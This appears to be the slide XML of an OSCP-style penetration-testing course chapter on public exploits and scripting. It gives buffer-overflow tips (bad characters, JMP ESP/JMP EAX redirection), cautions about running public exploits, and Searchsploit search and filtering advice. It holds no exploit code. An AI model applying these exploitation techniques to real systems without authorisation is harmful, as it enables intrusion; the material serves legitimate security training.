          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93460" y="1230868"/>
            <a:ext cx="1118013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Some other thoughts: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Sometimes you may need to test bad characters in the filler because there’s no room after the ESP. In this case, sometimes these bad characters can cause the program not to crash (e.g. a terminating byte results in no overflow). You’ll need to get creative or run the bad characters a little bit at a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Don’t fixate on JMP ESP. If you need to put the payload elsewhere, like in the filler, simply look for other ways to get to it. You might need to do things like increment the memory address in a register like the EAX then pop it with a JMP EAX to get to the payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D7A88F-3544-4F27-A191-29C616DE7256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="365760"/>
            <a:ext cx="11338560" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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j-ea"/>
              </a:rPr>
              <a:t>Some Other Thoughts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15999251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B8001-CD78-6846-91F1-30431D512F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798439" y="1303655"/>
            <a:ext cx="9721599" cy="2009720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 4:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Exploits and Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308984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E2A71-87E3-46D1-AF78-6624C7630D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1BFCE23-1FC2-46A2-9AA6-1AE2CE69F2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28829448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CBD11B-49AB-450C-8399-EBF69253C10E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE2540A-F81D-440C-B849-1EDF852385B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cautions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fixing them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When to Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A few examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Warning with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6149D9FA-C372-4F45-8400-7C120B0FB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0020" y="1794940"/>
            <a:ext cx="451109" cy="451109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16875650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F085DD-C5D1-4AE6-B8DF-1138CFDC3D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2B140FB-B7B6-45A2-A4B7-CAD3EE143BAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Exploits – Cautions and Advice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF059B74-9EF9-48C3-B299-D988F9BB24EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7131681" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>ALWAYS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> read the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted source ≠ safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsafe for you and your client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OSCP is for learning and experimentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OK to take risks here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not get in the habit of running everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For OSCP, version mismatch does not always mean it is unapplicable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.: exploit for 4.0.1 may work on 3.9.7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE8EEAD2-AA26-462F-BD08-FD2735583FE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t="7858" b="10211"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383459" y="1742440"/>
            <a:ext cx="4659002" cy="3820160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="718227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0DABEB-2946-48ED-B5AE-4EFEA5B16975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247650" y="3315046"/>
            <a:ext cx="11696700" cy="2657475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B36C5AD-048A-4E13-A9EC-CB67F20B99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995AE914-40AF-4670-9A96-A0EE2C860F96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Exploits - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B7E5F9B-CFEE-4A90-9917-4813D9F2AE0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1844040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offline database of exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tied to Exploit-DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has off-the-shelf exploits as well as instructions/papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to search and filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37641431-562B-410C-84DF-A26698B16202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953209" y="4282440"/>
            <a:ext cx="1513840" cy="1691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83694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DBCB3A-5984-4F08-8E21-13BD9657A6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91E0846-9301-4222-B076-D9C43B76F206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Searching and Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4DF016E-9801-45B9-BF2C-05E2D36653B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1844040"/>
            <a:ext cx="7815261" cy="4328160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default, case insensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also use multiple-word phrases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular software and software that has keywords in its name may return too many results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filter with built-in tools and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Examples on next slides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9593255-F270-4FD8-8C1E-FE692191251B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="80341" b="72644"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8032969" y="2543053"/>
            <a:ext cx="3745449" cy="2343049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22611487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B345F7-4EA0-478B-AF14-B589B3206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06E188B-FD2F-4132-B097-164571FCFBF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Title Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DE8C56-E61F-4062-A0AE-675176C9526B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="441960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘Windows’ is part of the file path for a lot of exploits, cut these out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7187F47-1EB8-4E9B-823A-5D8E855F6CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="18682"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1166420" y="1705693"/>
            <a:ext cx="9209526" cy="2565580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFF6026-52B2-42E7-8E9D-9FCC14BC5555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="4456033"/>
            <a:ext cx="11363325" cy="2013693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6879B0B0-B5D8-46F7-8FA9-04896DA3E07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325274" y="2495912"/>
            <a:ext cx="981560" cy="9330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069B972F-5451-4E1D-8E59-ABC489EE2D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7436619" y="2410084"/>
            <a:ext cx="981560" cy="1042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0543A29D-1A49-484D-AE89-C4C8AE0EAAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002034" y="4653905"/>
            <a:ext cx="355600" cy="375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909248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A99152-EFC8-4D46-AD4D-75581D3991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B1FCE8A-DB87-4E7F-949F-793EB864FA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Term Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EDEFBE-4818-4E16-AD24-3FAD16A8B0C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="553720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We often don’t want DoS exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BCA2ED-6E79-4E5E-A515-21842D88D2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="4903" b="22447"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204034" y="2047935"/>
            <a:ext cx="9804400" cy="1863666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C79D755-CBE1-41B4-89E3-C0D95B53803D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9123680" y="2916268"/>
            <a:ext cx="436880" cy="3759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6B197CA8-F050-4683-AF62-DA4468EC7A69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="4833" b="22184"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204034" y="4369495"/>
            <a:ext cx="9804400" cy="1748016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E717E127-F46F-4225-8159-BCA88988F3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="4512233"/>
            <a:ext cx="1463040" cy="3759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94601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AA938-E512-438F-8648-11475990B1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8BE40C0-1026-4992-9964-129927A212C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
